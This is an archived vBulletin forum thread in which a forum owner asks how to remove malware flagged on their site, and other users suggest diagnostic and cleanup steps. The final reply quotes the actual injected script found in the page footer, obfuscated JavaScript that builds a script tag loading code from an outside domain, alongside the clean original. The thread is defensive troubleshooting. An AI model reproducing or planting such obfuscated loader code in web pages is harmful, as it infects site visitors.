vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Malware showing on site (https://vborg.vbsupport.ru/showthread.php?t=279633)

dazzled 03-06-2012 02:50 PM
Malware showing on site
 
Hey guys,

My forum members recently reported that when they go to the site, (logged in or not) they get a notification that malware has been detected and caught by their antivirus. I use avast, and have been getting the same issue.

I ran a scan on Surucri, and these are the results: http://sitecheck.sucuri.net/results/caiqueforum.com

The malware detection that pops up with Avast names this url as the offending subject: "directmarkering12linear.in/in.cgi?walter"

I've searched my site files for the above URL, and not found anything. I'm at a loss, and members are avoiding the site now until the malware has been taken care of.

How can I get rid of this crap?

Max Taxable 03-06-2012 03:13 PM
Try your site on this:

http://www.webpagetest.org/

It will give you a complete picture of every request, all errors, etc. This is likely coming from third party advertising.

Keev 03-06-2012 05:13 PM
Not sure what that tool is suppose to tell ya... doesn't say the location of where to remove infections.... I have looked over the footer files where normally they like to inject a line of code and nothing

dazzled 03-06-2012 10:07 PM
Yes it gives a complete picture of the fact that there are errors but it doesn't show where the malicious code is embedded and when I manually examine the files I can't pinpoint any malicious code.

kh99 03-06-2012 11:05 PM
I'm not an expert on this kind of thing, but: check the plugin manager for any plugins you don't recognize - you could also try disabling plugins and see if that removes the malware (if it does you still need to find the plugin, of course). It wouldn't hurt to re-upload all your vb files (assuming you haven't made any changes to them of course). And there's also this script: https://vborg.vbsupport.ru/showthread.php?t=220967 which recompiles any templates where the compiled version has changed (someone with access to the db can hide stuff in the compiled templates that you'll never see unless you look in the database). That mod is for vb3, but I think it just needs a minor change to work in vb4 (I posted the change in post#74 of that thread).

ETA: oh, also you can run (from the adminCP) Maintenance -> Diagnostics -> Suspect File Versions to make sure there aren't any files on your server that shouldn't be there.

Of course the most important thing it to try to figure out how the stuff got there in the first place or it's likely to happen again after you clean up. At the very least you should change your passwords, I would think.

Max Taxable 03-06-2012 11:12 PM
Quote:
Originally Posted by dazzled (Post 2306960)
Yes it gives a complete picture of the fact that there are errors but it doesn't show where the malicious code is embedded and when I manually examine the files I can't pinpoint any malicious code.
The offending object you posted,
PHP Code:
"directmarkering12linear.in/in.cgi?walter" 
Should be showing in either the waterfall or the detailed breakdown.

Simon Lloyd 03-06-2012 11:34 PM
You have injected code or infected php, at the bottom of your source code you have this
HTML Code:
<script type="text/javascript">
        <!--
                // Main vBulletin Javascript Initialization
                var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
        //-->
        </script>
when it should look like this
HTML Code:
<script type="text/javascript">
        <!--
                // Main vBulletin Javascript Initialization
                vBulletin_init();
        //-->
        </script>
Check your php files for Eval(base64 code


All times are GMT. The time now is 12:21 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01146 seconds
  • Memory Usage 1,733KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_html_printable
  • (1)bbcode_php_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (7)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete